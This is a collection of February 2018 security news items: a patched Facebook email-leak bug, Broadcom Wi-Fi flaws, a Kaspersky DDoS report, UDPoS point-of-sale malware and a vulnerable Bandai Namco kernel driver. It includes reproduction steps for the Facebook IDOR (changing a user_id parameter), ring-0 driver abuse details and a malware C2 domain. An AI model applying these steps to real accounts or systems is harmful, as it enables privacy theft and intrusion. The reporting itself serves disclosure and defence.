To reproduce the bug, one would simply head to the Settings section at https://partners.facebook.com/fbs/settings/, add a name, and enter an email they control in the email field.

Next, they should simply hit the “Add” button, intercept the POST request to /mobile/settings/requirements/save/, and modify the values [settings.users.userstablecontainer.user_id] GET parameter to the ID of the victim whose email they would like to reveal, then forward the request.

Thus, the email Facebook sends to the user’s controlled address contains the victim's primary mail as part of <a href link >, the security researcher found.

Franjkoviæ reported the discovery on September 30, 2017, and Facebook informed him a couple of days later that they fixed an account takeover vulnerability in their platform. The original privacy leak bug, however, was resolved only in late October, after the researcher informed the company the exploit would still work.

After requesting more information from Facebook, the researcher found that the bug he discovered could result in the leaking of login codes. One other parameter in the email link could “potentially be used to login to the user's account (with some restrictions),” the researcher explains.

The feature, however, wasn’t enabled for the researcher’s account, so he could not notice it in the first place.

“Thank you Facebook's security team for being (more than) fair - they could have awarded only the email leak bug, and I would never know this was an account takeover,” the researcher notes.

Facebook too has confirmed that, after analyzing the bug reported by Franjkoviæ internally, the security team discovered that it could potentially allow an attacker to gain access to another account.

“We did a complete review and we determined that there is no evidence that these tactics were used or that personal information was exposed,” a post by the Facebook Bug Bounty team reads.

Franjkoviæ confirmed in an email discussion with SecurityWeek that Facebook increased the paid bounty to reward him for the more important vulnerability. While he wouldn’t reveal the exact amount he received, he did say it was his biggest bounty to date.


Lenovo patches critical flaws that affect Broadcom’s chipsets in dozens of Lenovo ThinkPad
10.2.2018 securityaffairs
Vulnerebility

According to a security advisory issued by Lenovo, two critical vulnerabilities in Broadcom chipsets affects at least 25 models of Lenovo ThinkPad.
The affected models are ThinkPad 10, ThinkPad L460, ThinkPad P50s, ThinkPad T460, ThinkPad T460p, ThinkPad T460s, ThinkPad T560, ThinkPad X260 and ThinkPad Yoga 260.

One of the flaws was discovered in June by Google that publicly disclosed it in September. Google also published a proof-of-concept exploit for a Wi-Fi firmware vulnerability affecting Broadcom chipsets in iOS 10 and earlier.

The flaw tracked as CVE-2017-11120, is a memory corruption vulnerability that could be exploited by attackers to execute code and establish a backdoor on a targeted device. T

The flaw initially reported affecting specific Broadcom chipsets used in Apple iPhones, Apple TV, and Android devices was patched in the same month.

The vulnerability, tracked as CVE-2017-11120, is a memory corruption vulnerability, Apple addressed it in the security update for the release of iOS 11.

Now Lenovo warns of the presence of the flaw in two dozen ThinkPad models that use Broadcom’s BCM4356 Wireless LAN Driver for Windows 10.

The Broadcom Wi-Fi chipsets used by Lenovo ThinkPad devices are affected by the CVE-2017-11120 flaw and also by the CVE-2017-11121 vulnerability, both issue are rated as “critical” and received a CVSS 10 score.

“Broadcom has issued an advisory for certain Broadcom WiFi controllers used by many computer and device makers, which contain buffer overflow vulnerabilities on the adapter (not the system CPU).“reads the security advisory.” Broadcom initially did not plan to remediate these issues, but when the WPA2 KRACK issue also emerged, Broadcom combined both fixes in to a single set of driver updates. Lenovo received the first of these near the end of 2017, and continues releasing fixes as integration and testing is completed.”

The flaws can be exploited by remote attackers to execute arbitrary code on the adapter (not the system’s CPU) of the target system.

The CVE-2017-11121 vulnerability was also discovered by Google experts, it is a buffer overflow vulnerability caused by improper validation of Wi-Fi signals.

“Properly crafted malicious over-the-air Fast Transition frames can potentially trigger internal Wi-Fi firmware heap and/or stack overflows, leading to denial of service or other effects,” reads the description for the flaw.

Lenovo users urge to update the Wi-Fi driver for their ThinkPad models.


fail0verflow hackers found an unpatchable flaw in Nintendo Switch bootROM and runs Linux OS
10.2.2018 securityaffairs Hacking

The group of hackers known as ‘fail0verflow’ has discovered a vulnerability in the gaming console Nintendo Switch that could be exploited to install a Linux distro.
The hackers announced their discovery in a post on Twitter, the published an image of a console running the Debian Linux distro after the hack.


fail0verflow
@fail0verflow
🐧🐧🐧🐧 #switch

4:16 PM - Feb 6, 2018
4,917
2,269 people are talking about this
Twitter Ads info and privacy
The fail0verflow group revealed that the exploit triggers a flaw in the boot ROM process of the Nvidia Tegra X1 chip that powers the console, if confirmed the issue cannot be solved with a software o firmware update.

When asked if they have built the hack on nvtboot the group No closed-source boot chain components were involved.

Discovery of a flaw in the Boot ROM opens the door to the hack of the console for other purposes, for example to the piracy.

nintendo switch

In a next future, hackers could find a way to install homebrew apps and pirated games on the Nintendo Switch.

On the other side, Nintendo could work with Nvidia on new secure Tegra X1 chips, as a temporary solution it could ban users with hacked consoles to ban these users from online play.


VMware releases temporary mitigations for Meltdown and Spectre flaws
10.2.2018 securityaffairs
Vulnerebility

VMware has provided detailed instruction on how to mitigate the Meltdown and Spectre vulnerabilities in several of its products.
VMware is releasing patches and workarounds for its Virtual Appliance products affected by the Meltdown and Spectre vulnerabilities.

The Meltdown and Spectre attacks could be exploited by attackers to bypass memory isolation mechanisms and access target sensitive data.

The mitigations measures could be applied to vCloud Usage Meter, Identity Manager (vIDM), vCenter Server, vSphere Data Protection, vSphere Integrated Containers and vRealize Automation (vRA).

“VMware Virtual Appliance updates address side-channel analysis due to speculative execution” states the advisory published by the company.

The company acknowledged problems for its virtual appliances and opted to release workarounds to protect its customers. The proposed solutions are only temporary waiting for a permanent fix that will be released as soon as they are available.

The complete list of workarounds is available here, in some cases, admins can mitigate the issue by launching a few commands as a privileged user, in other cases the procedure to deploy mitigations is more complex.


DDoS attacks in Q4 2017
10.2.2018 Kaspersky  Analysis 
Attack

News overview
In terms of news about DDoS attacks, the last quarter of 2017 was livelier than the previous one. Some major botnets were discovered and destroyed. For instance, early December saw the FBI, Microsoft, and Europol team up to knock out the Andromeda botnet, in operation since 2011. In late October, the Indian Computer Emergency Response Team (CERT) issued a warning about a massive botnet being assembled by a hacker group using the Reaper and IoTroop malware; earlier that same month, the spread of Sockbot through infected Google Play apps was detected and terminated.

Besides the various battles with Trojan-infested botnets, the last three months of 2017 were dominated by three main DDoS trends: politically motivated attacks, attempts to cash in on the soaring price of Bitcoin, and tougher law enforcement.

Politically motivated DDoS attacks remain eye-catching, but fairly ineffective. In late October again, during parliamentary elections in the Czech Republic, the country’s statistical office was hit by a DDoS attack in the middle of the vote count. The attack was a nuisance, but nothing more, and the results of the elections were duly announced on time.

Another DDoS-based political protest was aimed at the Spanish government in connection with the Catalan question. Hacktivists from the Anonymous group managed to take down the website of Spain’s Constitutional Court, and defaced the Ministry of Public Works and Transport’s website with the message “Free Catalonia.”

But politics is politics, and business is, well, just that. As we noted in the previous quarter, Bitcoin and everything associated with it has hit peak commercial popularity — not surprising, considering the explosive growth in its value. No sooner had Bitcoin spawned a new kind of cryptocurrency in the shape of Bitcoin Gold (BTG) than BTG sites immediately came under DDoS fire. After the price of the cryptocurrency took off in November, DDoS attacks rained down on the Bitfinex exchange — apparently with the aim of profiting from Bitcoin price fluctuations caused by denial of service. Still punch-drunk from the November attack, Bitfinex was paralyzed by two more onslaughts in early December.

On the topic of total failure, it would be amiss not to mention the shutdown of four shadow markets in the deep web used for all kinds of illegal trade: Trade Route, Tochka, Wall Street Market, and Dream Market. They have been operating erratically ever since October. It wasn’t clear at first what was behind these massive, well-coordinated attacks: the law enforcement agencies (as in the recent destruction of AlphaBay and Hansa) or competitors attempting to encroach on their territory. The subsequent attacks on all other trading platforms in early December dispelled most analysts’ doubts that it was a full-scale cyberwar between drug cartels.

However, the law — in particular, the judicial system — is not sitting idly by. Q4 saw a whole host of charges and sentences handed down in DDoS-related cases. The US judicial system was the most active: in mid-December, three defendants, Paras Jha, Josiah White, and Dalton Norman, confessed to being the brains behind the Mirai botnet.

And in late December, the founders of the notorious hacker groups Lizard Squad and PoodleCorp — Zachary Buchta of the U.S. and Bradley Jan Willem van Rooy of the Netherlands — were convicted.

In Britain, the high-profile case of young hacker Alex Bessell from Liverpool went to trial. Bessell was recently jailed for having launched a series of major cyber attacks in the period 2011-2013 against such giants as Skype, Google, and Pokemon. An even younger British hacker who targeted NatWest Bank, the National Crime Agency, Vodafone, the BBC, and Amazon was handed 16 months’ detention, suspended for two years.

A curious incident concerned 46-year-old John Gammell of Minnesota, who was charged with hiring three hacking services to create problems for his former employers, the websites of the judicial system of the district where he lived, and several other companies where he was once a contractor. The sponsors of DDoS attacks are often hard to track down, but Gammel couldn’t resist the temptation to tease his targets with emails — which led to his capture. As the investigators reported, the hacking services dealt with Gammel very professionally and cordially, thanking him for procuring their services and even upgrading his membership.

Quarter trends
Q4 demonstrated that DDoS attacks can be categorized as persistent online “crosstalk.” Junk traffic has become so widespread that server failure from too many requests might not be attack-related, but the accidental result of botnet side activities. For instance, in December we logged a huge number of requests to non-existent 2nd and 3rd level domains, which created an abnormal load on DNS servers in the RU zone. A modification of the Lethic Trojan turned out to be the culprit. This long-known malware comes in many different flavors, its main task being to allow spam traffic to pass through infected devices, basically like a proxy server.

The version we discovered was unlike most modifications in that it operates in multiple threads to create a huge number of requests to non-existent domains. The study found that this behavior was an attempt to mask the command-and-control (C&C) server addresses behind numerous junk requests, and the excessive load on the DNS servers was simply the result of the malware’s poor design. Nevertheless, DDoS attacks on DNS servers using junk requests are quite common and easy to implement. Our experts have assisted clients in many such instances. What’s interesting here is the method employed, as well as the perhaps unintended effect.

Statistics for botnet-assisted DDoS attacks
Methodology
Kaspersky Lab has extensive experience of combating cyber threats, including DDoS attacks of various complexity types and ranges. Company experts track the actions of botnets by using the DDoS Intelligence system.
Being part of the Kaspersky DDoS Prevention solution, the DDoS Intelligence system intercepts and analyzes commands sent to bots from C&C servers and requires neither the infection of any user devices, nor the actual execution of cybercriminals’ commands.

This report contains DDoS Intelligence statistics for Q4 2017.

In the context of this report, it is assumed that an incident is a separate (single) DDoS-attack if the interval between botnet activity periods does not exceed 24 hours. For example, if the same web resource was attacked by the same botnet with an interval of 24 hours or more, then this incident is considered as two attacks. Also, bot requests originating from different botnets but directed at one resource count as separate attacks.

The geographical locations of DDoS-attack victims and C&C servers used to send commands are determined by their respective IP addresses. The number of unique targets of DDoS attacks in this report is counted by the number of unique IP addresses in the quarterly statistics.

DDoS Intelligence statistics are limited only to those botnets detected and analyzed by Kaspersky Lab. It should also be noted that botnets are just one of the tools for performing DDoS attacks; thus, the data presented in this report do not cover every single DDoS attack that occurred during the specified period.

Quarter results
In Q4 2017, DDoS attacks were registered against targets in 84 countries (98 in Q3). However, as in the previous quarter, the overwhelming majority of attacks occurred in the top ten countries in the list (94.48% vs. 93.56%).
More than half of all attacks in Q4 (51.84%) were aimed at targets in China — almost unchanged since Q3 (51.56%).
In terms of both number of attacks and number of targets, South Korea, China, and the US remain out in front. But in terms of number of botnet C&C servers, Russia pulled alongside this trio: its relative share matched China’s.
The longest DDoS attack of Q4 2017 lasted 146 hours (just over six days). This is significantly shorter than the previous quarter’s record of 215 hours (almost nine days). 2017’s longest attack (277 hours) was registered in Q2.
The days before and after Black Friday and Cyber Monday saw increased activity on dummy Linux servers (honeypot traps), which lasted right up until the beginning of December.
SYN DDoS remains the most common attack method, while the least popular is ICMP DDoS. According to Kaspersky DDoS Protection data, the frequency of multi-method attacks rose.
In Q4 2017, the share of Linux botnets climbed slightly to 71.19% of all attacks.
Geography of attacks
In Q4 2017, DDoS attacks affected 84 countries, which represents a slight improvement over the previous quarter, when 98 countries were hit. Traditionally, China is most in the firing line, although the country’s share of attacks decreased slightly (from 63.30% to 59.18%), approaching the Q2 level. The figures for the US and South Korea, which retained second and third place, went up slightly to 16.00% and 10.21%, respectively.

Fourth place went to Britain (2.70%), which climbed 1.4% to overtake Russia. Although Russia’s share of attacks dropped insignificantly (by 0.3%), that was enough to push it into sixth place behind Vietnam (1.26%), which made a return to the leaderboard, squeezing Hong Kong out of the top ten.

 

The percentage of attacks directed against targets in the top ten countries grew in the last quarter (but not by much) to almost 92.90% vs. 91.27% in Q3 2017. The landscape is much the same as before.

About half of all targets are still in China (51.84%), followed by the US (19.32%), where the number of targets is again nearing 20% after a slight dip in Q3; South Korea is third with 10.37%. Vietnam again ousted Hong Kong from the top ten, taking ninth place with a 1.13% share, while Russia (1.21%) came seventh with a loss of 1%, making way for Britain (3.93%), France (1.60%), Canada (1.24%), and the Netherlands (1.22%), whose figures did not change much against the previous quarter.

 

Dynamics of the number of DDoS attacks
Statistical analysis of specially prepared Linux servers — so-called honeypot traps — shows that peak botnet activity this quarter occurred during the pre- and post-holiday sales. Feverish cybercriminal activity was clearly observed around Black Friday and Cyber Monday, dying down by the second third of December.

The most significant peaks occurred on November 24 and 29, when the number of individual IPs storming our resources doubled. Some increase in activity was also observed in late October — most likely Halloween-related.

Such fluctuations point to attempts by cybercriminals to boost their botnets in the run-up to major sales. Pre-holiday periods are incubators of cybercriminal growth for two reasons: first, users are less discerning and more likely to “surrender” their devices to intruders; second, the prospect of a fast buck makes it possible to blackmail Internet companies with lost profits or to offer one’s services in the cut-throat struggle online.
 

Dynamics of the number of Linux-based attacks in Q4 in 2017*
*Shows changes in the number of unique IPs per 24 hours

Types and duration of DDoS attacks
In Q4, the share of SYN DDoS attacks decreased (from 60.43% to 55.63%) due to less activity by the Linux-based Xor DDoS botnet. These attacks still rank first, however. The percentage of ICMP attacks (3.37%), still the least common, also fell. The relative frequency of other types of attacks increased, but whereas in the previous quarter TCP attacks ranked second after SYN, UDP overshadowed both these types, rising from second-to-last to second-from-top (in Q4 UDP DDoS accounted for 15.24% of all attacks).

 

Kaspersky DDoS Protection annual statistics show a decline in the popularity of DDoS attacks involving only pure HTTP and HTTPS flooding. The frequency of multi-method attacks rose accordingly. Nevertheless, one in three mixed attacks contained an HTTP or HTTPS flood. This may be due to the fact that HTTP(S) attacks are quite expensive and complex, while in a mixed attack they can be used by cybercriminals to increase the overall effectiveness without additional costs.

 

Correlation between attack types according to Kaspersky DDoS Protection, 2016 and 2017

The longest attack in Q4 was significantly shorter than its Q3 counterpart: 146 hours (about 6 days) vs. 215 (about 9). That’s barely half the Q2 and 2017 record of 277 hours. Overall, the share of longish attacks continues to decline, albeit insignificantly. This also applies to attacks lasting 100-139 hours and 50-99 hours (the shares of these categories are so small that even a change of 0.01% is news). The most common are still micro-attacks, lasting no more than four hours: their share rose slightly to 76.76% (vs. 76.09% in Q3). Also up was the proportion of attacks lasting 10-49 hours, but again not by much — about 1.5%.

 

Distribution of DDoS attacks by duration (hours), Q3 and Q4 2017

C&C servers and botnet types
The top three countries by number of C&C servers remained as before: South Korea (46.63%), the US (17.26%), China (5.95%). Yet although the figures for the latter two climbed slightly against Q3, China had to share third place with Russia, which gained 2%, the reason being that despite the fact that the leaders’ share changed insignificantly percentage-wise, in absolute terms the number of C&C servers detected in all three countries almost halved. This is at least partially due to the termination of many Nitol botnet admin servers and the less active Xor botnet. On a separate note, this category’s top ten welcomed Canada, Turkey, and Lithuania (1.19% each), while Italy, Hong Kong, and Britain departed the list.
 

Distribution of botnet C&C servers by country, Q4 2017

The steady increase in the number of Linux-based botnets continued this quarter: their share now stands at 71.19% against Q3’s 69.62%. Accordingly, the share of Windows-based botnets fell from 30.38% to 28.81%.

 

Correlation between Windows- and Linux-based botnet attacks, Q4 2017

Conclusion
Q4 2017 represented something of a lull: both the number and duration of DDoS attacks were down against the previous quarter. The final three months of 2017 were even calmer than the first three. Alongside the rising number of multicomponent attacks involving various combinations of SYN, TCP Connect, HTTP flooding, and UDP flooding techniques, the emerging pattern suggests a backsliding for DDoS botnets in general. Perhaps the economic climate or tougher law enforcement has made it harder to maintain large botnets, causing their operators to switch tactics and start combining components from a range of botnets.

At the same time, the increase in the number of attacks on honeypot traps in the runup to holiday sales indicates that cybercriminals are keen to expand their botnets at the most opportune moment, looking to grab a slice of the pie by pressuring owners of online resources and preventing them from making a profit. In any event, the DDoS spikes around Black Friday and Cyber Monday were a salient feature of this quarter.

Another aspect of the late fall/early winter period was the continued attacks on cryptocurrency exchanges in line with the trends of the past months. Such fervor on the part of cybercriminals is not surprising given the explosive growth in the price of Bitcoin and Monero. Barring a collapse in the exchange rate (short-term fluctuations that only encourage speculators do not count), these exchanges are set to remain a prime target throughout 2018.

What’s more, the last quarter showed that not only are DDoS attacks a means to make financial or political gain, but can produce accidental side effects, as we saw last December with the junk traffic generated by the Lethic spam bot. Clearly, the Internet is now so saturated with digital noise that an arbitrary resource can be hit by botnet activity without being the target of the attack or representing any value whatsoever to the attackers.


WordPress Update Breaks Automatic Update Feature—Apply Manual Update
9.2.2018 thehackernews
Vulnerebility
WordPress administrators are once again in trouble.
WordPress version 4.9.3 was released earlier this week with patches for a total 34 vulnerabilities, but unfortunately, the new version broke the automatic update mechanism for millions of WordPress websites.
WordPress team has now issued a new maintenance update, WordPress 4.9.4, to patch this severe bug, which WordPress admins have to install manually.


According to security site WordFence, when WordPress CMS tries to determine whether the site needs to install an updated version, if available, a PHP error interrupts the auto-update process.
If not updated manually to the latest 4.9.4 version, the bug would leave your website on WordPress 4.9.3 forever, leaving it vulnerable to future security issues.
Here's what WordPress lead developer Dion Hulse explained about the bug:
"#43103-core aimed to reduce the number of API calls which get made when the auto-update cron task is run. Unfortunately, due to human error, the final commit didn't have the intended effect and instead triggers a fatal error as not all of the dependencies of find_core_auto_update() are met. For whatever reason, the fatal error was not discovered before 4.9.3's release—it was a few hours after release when discovered."
The issue has since been fixed, but as reported, the fix will not be installed automatically.


Thus, WordPress administrators are being urged to update to the latest WordPress release manually to make sure they'll be protected against future vulnerabilities.
To manually update their WordPress installations, admin users can sign into their WordPress website and visit Dashboard→Updates and then click "Update Now."
After the update, make sure that your core WordPress version is 4.9.4.
However, not all websites being updated to the faulty update have reported seeing this bug. Some users have seen their website installed both updates (4.9.3 and 4.9.4) automatically.
Moreover, the company released two new maintenance updates this week, but none of them includes a security patch for a severe application-level DoS vulnerability disclosed last week that could allow anyone to take down most WordPress websites even with a single machine.
Since WordPress sites are often under hackers target due to its wide popularity in the content management system (CMS) market, administrators are advised to always keep their software and plugins up-to-date.


New Point-of-Sale Malware Steals Credit Card Data via DNS Queries
9.2.2018 thehackernews
Virus

Cybercriminals are becoming more adept, innovative, and stealthy with each passing day. They are now adopting more clandestine techniques that come with limitless attack vectors and are harder to detect.
A new strain of malware has now been discovered that relies on a unique technique to steal payment card information from point-of-sale (PoS) systems.
Since the new POS malware relies upon User Datagram Protocol (UDP) DNS traffic for the exfiltration of credit card information, security researchers at Forcepoint Labs, who have uncovered the malware, dubbed it UDPoS.
Yes, UDPoS uses Domain Name System (DNS) queries to exfiltrate stolen data, instead of HTTP that has been used by most POS malware in the past. This malware is also thought to be first of its kind.
Besides using 'unusual' DNS requests to exfiltrate data, the UDPoS malware disguises itself as an update from LogMeIn—a legitimate remote desktop control service used to manage computers and other systems remotely—in an attempt to avoid detection while transferring stolen payment card data pass firewalls and other security controls.
"We recently came across a sample apparently disguised as a LogMeIn service pack which generated notable amounts of 'unusual' DNS requests," Forcepoint researchers said in a blogpost published Thursday.
"Deeper investigation revealed something of a flawed gem, ultimately designed to steal magnetic stripe payment card data: a hallmark of PoS malware."
The malware sample analyzed by the researchers links to a command and control (C&C) server hosted in Switzerland rather than the usual suspects of the United States, China, Korea, Turkey or Russia. The server hosts a dropper file, which is a self-extracting archive containing the actual malware.
It should be noted that the UDPoS malware can only target older POS systems that use LogMeIn.
Like most malware, UDPoS also actively searches for antivirus software and virtual machines and disable if find any. The researchers say it's unclear "at present whether this is a reflection of the malware still being in a relatively early stage of development/testing."
Although there is no evidence of the UDPoS malware currently being in use to steal credit or debit card data, the Forcepoint's tests have shown that the malware is indeed capable of doing so successfully.
Moreover, one of the C&C servers with which the UDPoS malware sample communicates was active and responsive during the investigation of the threat, suggesting the authors were at least prepared to deploy this malware in the wild.
It should be noted that the attackers behind the malware have not been compromised the LogMeIn service itself—it's just impersonated. LogMeIn itself published a blogpost this week, warning its customers not to fall for the scam.
"According to our investigation, the malware is intended to deceive an unsuspecting user into executing a malicious email, link or file, possibly containing the LogMeIn name," LogMeIn noted.
"This link, file or executable isn't provided by LogMeIn and updates for LogMeIn products, including patches, updates, etc., will always be delivered securely in-product. You'll never be contacted by us with a request to update your software that also includes either an attachment or a link to a new version or update."
According to Forcepoint researchers, protecting against such threat could be a tricky proposition, as "nearly all companies have firewalls and other protections in place to monitor and filter TCP- and UDP-based communications," but DNS is still often treated differently, providing a golden opportunity for hackers to leak data.
Last year, we came across a Remote Access Trojan (RAT), dubbed DNSMessenger, that uses DNS queries to conduct malicious PowerShell commands on compromised computers, making the malware difficult to detect onto targeted systems.


A vulnerable driver: lesson almost learned

9.2.2018 Kaspersky  Vulnerebility
How not to use a driver to execute code with kernel privileges
Recently, we started receiving suspicious events from our internal sandbox Exploit Checker plugin. Our heuristics for supervisor mode code execution in the user address space were constantly being triggered, and an executable file was being flagged for further analysis. At first, it looked like we’d found a zero-day local privilege escalation vulnerability for Windows, but the sample that was triggering Exploit Checker events turned out to be the clean signed executable GundamOnline.exe, part of the multiplayer online game Mobile Suit Gundam Online from BANDAI NAMCO Online Inc.

The initial sample is packed using a custom packer and contains anti-analysis techniques that complicate static analysis. For example, it tries to detect if it’s being launched inside a virtual machine by performing a well-known VMware hypervisor detection routine. It first loads the EAX register with the hypervisor magic value VMXh, and the ECX register with the value 0x0A, which is a special command to receive the hypervisor version. Then it performs an ‘in’ command to the VMware hypervisor I\O port 0x5658. If the EBX register is overwritten with VMXh as a result of that operation, it means the executable file is running on the VMware machine.
 

Our sandbox execution logs showed that the user space memory page is called from the driver bandainamcoonline.sys immediately after IOCTL request 0xAA012044 to device object \\.\Htsysm7838 that is created by the driver. The driver itself is installed just before that. It is first dropped to the directory C:\Windows\SysWOW64\ by a GundamOnline executable, loaded using NtLoadDriver() and deleted immediately afterwards.
 

Normally, this kind of behavior should not be allowed due to SMEP (Supervisor Mode Execution Prevention). This is a security feature present on the latest Intel processors that restricts supervisor mode execution on user memory pages. Page type is determined using the User/Supervisor flag in the page table entry. If a user memory page is called while in supervisor execution mode, SMEP generates an access violation exception and, as a result, the system will trigger a bug check and halt. This is commonly referred to as a BSOD.
 

The dropped driver itself is a legitimate driver, signed with a certificate issued to NAMCO BANDAI Online Inc.

The certificate validity period tells us two things. First, this certificate has been valid since 2012, which could mean that the first vulnerable version of the driver was released around the same time. However, we were unable to find one; the earliest sample of bandainamcoonline.sys that we found dates back to November 2015. Secondly, because it expired more than three years ago, you could be forgiven for thinking it’s impossible to install a driver signed with this certificate in a system. Actually, there’s nothing stopping you from installing and loading a driver with an expired certificate validity period.

In order to find the cause of the heuristics trigger, we need to do a static analysis of the driver itself. In the DriverEntry function it first decodes the device object name string in memory, and then creates the device \\.\Htsysm7838. The other two encoded strings – bandainamcoonline and bandainamcoonline.sys – are not used in the driver.
 

The driver itself is very small and contains only three registered major functions. Function IRP_MJ_DEVICE_CONTROL, which handles requests, accepts only two IOCTLs: 0xAA012044 and 0xAA013044. When called, it checks the size of the input and output buffers and eventually calls the ExecuteUserspaceCode function, passing on the contents of the input buffer to it.
 

The function ExecuteUserspaceCode performs a single check on the input buffer, which contains a pointer to a user space function or a shellcode, and disables SMEP while saving old CR4 register values. It then calls that function, passing it a pointer to the MmGetSystemRoutineAddress as an argument. After that it restores the original register state, re-enabling SMEP.
 

To be able to directly call the user function from the provided pointer driver it is necessary to remove a specific bit in the CR4 register first to temporarily stop SMEP, which is what the DisableSMEP function does. The original CR4 values are then restored by the EnableSMEP function.

The vulnerability in this case is that other than the basic checks on the format of the input buffer, no additional checks are done. Therefore, any user on the system can use this driver to elevate their privileges and execute arbitrary code in the Ring 0 of the OS. Even if the driver is not present in the system, an attacker can register it with Windows API functions and exploit the flaw.

We realized that this vulnerability looks exactly like the one found in Capcom’s driver last year.
 

Binary diffing bandainamcoonline.sys and capcom.sys proves exactly that, showing there are almost no differences between the two drivers. The only slight variations are the encoded strings and digital signatures. Because the earliest sample of the vulnerable driver that we’ve been able to find dates to November 2015, it can be assumed that this vulnerability first appeared in the bandainamcoonline.sys driver – almost a year before a similar driver was used by Capcom.

We believe both drivers were almost certainly compiled from the same source code, as a part of an anti-hacking solution to prevent users from cheating in the game. The presence of functions that implicitly disable and re-enable SMEP show that this design decision was intentional. But because the driver makes no additional security checks, any user can call and exploit the vulnerable IO control code by using Windows APIs such as DeviceIoControl(). This essentially makes the driver a rootkit, allowing anyone to interact with the operating system at the highest privilege level. In fact, we found multiple malware samples (already detected by our products) using a previously known vulnerability in capcom.sys to elevate their privileges to System level.

After finding the vulnerability we contacted BANDAI NAMCO Online Inc. The vendor responded promptly and released a patch three days later. They removed the driver altogether, and it is no longer loaded by the game executable. This is very similar to what Capcom did, and is perfectly acceptable in this case.

Finding this vulnerability wouldn’t have been possible without our Exploit Checker technology, which is a plugin for our sandbox, and can be also found in KATA (Kaspersky Anti Targeted Attack Platform). The technology was designed to monitor suspicious events that occur at the earliest post-exploitation phases and can detect common techniques used in exploits, such as ROP, Heap Spray, Stack Pivot, and so on. In this particular case, multiple heuristics for executing code in supervisor mode in the user address space were triggered, and the sample was flagged for further analysis. If a token-swapping attempt was performed to elevate process privileges, a technique that’s widely used in LPE exploits, it would have been automatically detected by Exploit Checker heuristics.

Kaspersky Lab solutions detect the vulnerable drivers mentioned in this article as HEUR:HackTool.Win32.Banco.a and HEUR:HackTool.Win32.Capco.a.


Zerodium Offers $45,000 for Linux 0-Days
9.2.2018 securityweek  IT
Hackers willing to find unpatched vulnerabilities in the Linux operating system and report them to exploit acquisition firm Zerodium can earn up to $45,000 for their findings, the company announced on Thursday.

The company has been long acquiring vulnerabilities in Linux as part of its normal payouts program, but it would normally pay only up to $30,000 for Local Privilege Escalation flaws in the operating system. Until March 31, 2018, however, such flaws can earn hackers up to 50% more, Zerodium said on Twitter.


Zerodium

@Zerodium
Got a Linux LPE? Working with default installations of Ubuntu, Debian, CentOS/RHEL/Fedora? We are increasing our payouts to $45,000 per #0day exploit until March 31st, 2018. To submit, please check: https://zerodium.com/submit.html

4:03 PM - Feb 8, 2018
46
43 people are talking about this
Twitter Ads info and privacy

Zerodium claims that hackers who submit valid zero-day vulnerabilities in products of interest would receive payment for their efforts within a week after the initial submission.

The exploit acquisition firm is targeting vulnerabilities in the most commonly used Linux distributions and interested hackers can head over to its website to learn specific information on what is considered an eligible submission.

The payments promised for Linux vulnerabilities, however, aren’t the highest the company offers.

On desktop platforms, remote code execution flaws in Windows can earn the reporting hacker up to $300,000. Those who discover unpatched vulnerabilities in mobile operating systems can make up to $1,500,000, if the bug affects Apple’s iOS platform.

In fact, Zerodium is already known to have paid a group of hackers $1 million for a zero-day in iOS.

In August 2017, Zerodium announced it was prepared to pay up to $500,000 for unpatched vulnerabilities in popular instant messaging and email applications. The offer remains active in its current program.

In September last year, the company announced it was willing to pay up to $1 million for zero-day flaws in the Tor Browser. The “bounty” program ended in December 2017, but Zerodium wouldn’t provide information on the results of the operation.

Once in the possession of vulnerabilities it considers of interest, the company sells them to its customers as part of the Zerodium Zero-Day Research Feed. The company also says it analyzes, aggregates, and documents the acquired security intelligence before offering it, along with protective measures and security recommendations, to its clients.


New PoS Malware Family Discovered
9.2.2018 securityweek 
Virus
Researchers have discovered a new Point of Sale (POS) malware. They cannot tell yet whether it is new code still being developed, or already used -- complete with coding errors -- in an undetected campaign. They suspect the latter.

PoS malware has been responsible for a number of high profile data breaches over the last few years, including Hyatt Hotels, Chipotle Mexican Grill, Avanti Markets, and Sonic Drive-In. The growing use of EMV (chip & pin) payment cards in the U.S. makes card-present fraud more difficult. It was always expected that this would drive criminals towards card-not-present (that is, online) fraud; making the online theft of card details more attractive.

Forcepoint researchers Robert Neumann and Luke Somerville described the malware in a blog analysis posted today. "This appears to be a new family which we are currently calling 'UDPoS' owing to its heavy use of UDP-based DNS traffic." The researchers are not overly impressed by the quality of the coding, describing it as 'a flawed gem' -- where 'flawed' refers to the coding and 'gem' to the excitement of discovering a new needle in the haystack of old malware.

The malware uses a 'LogMeIn' theme as camouflage. The C2 server is service-logmeln.network (with an 'L' rather than an 'I') hosting the dropper file, update.exe. This is a self-extracting 7-Zip archive containing LogmeinServicePack_5.115.22.001.exe and logmeinumon.exe. The former, the service component of the malware, is run automatically by 7-Zip on extraction.

This service component is responsible for setting up its own folder, and establishing persistence. It then passes control to the second, or monitoring, component by launching logmeinumon.exe. The two components have a similar structure, and use the same string encoding technique to hide the name of the C" server, filenames and hard-coded process names.

The monitor component creates five different threads after attempting an anti-AV and virtual machine check and either creating or loading an existing ‘Machine ID'. The Machine ID is used in all the malware's DNS queries. The anti-AV/VM process is flawed, attempting to open only one of several modules.

When first run, the malware generates a batch file (infobat.bat) to fingerprint the infected device, with details written to a local file before being sent to the C2 server via DNS. The precise reason for this is unclear, but the researchers note, "The network map, list of running processes and list of installed security updates is highly valuable information."

Deeper analysis of the malware revealed a process designed to collect Track 1 and Track 2 payment card data by scraping the memory of running processes. "These processes," say the researchers, "are checked against an embedded and pre-defined blacklist of common system process and browser names with only ones not present on the list being scanned."

If any Track 1/2 data is found, it is sent to the C2 server. A log is also created and stored, "presumably," say the researchers, "for the purpose of keeping track of what has already been submitted to the C2 server."

When the researchers attempted to find additional samples of the same malware family, all they found was a different service component but without a corresponding monitor component. This one had an 'Intel' theme rather than a 'LogMeIn' theme. It was compiled at the end of September 2017, two weeks before the compilation stamp of October 11, 2017 for the LogMeIn components.

"Whether this is a sign that authors of the malware were not successful in deploying it at first or whether these are two different campaigns cannot be fully determined at this time due to the lack of additional executables," note the authors.

They warn that legacy PoS systems -- which can number thousands in large retailers -- are often based on variations of the Windows XP kernel. "While Windows POSReady is in extended support until January 2019, it is still fundamentally an operating system which is seventeen years old this year."

They urge sysadmins to monitor unusual activity patterns; in this case, DNS traffic. "By identifying and reacting to these patterns, businesses -- both PoS terminal owners and suppliers -- can close down this sort of attack sooner."

Austin, Texas based Forcepoint, originally known as Raytheon/Websense, was created in a $1.9 billion deal involving Raytheon, Websense and Vista Equity Partners in April 2015. It was renamed to Forcepoint in January 2016.


Actor Targeting Middle East Shows Excellent OPSEC
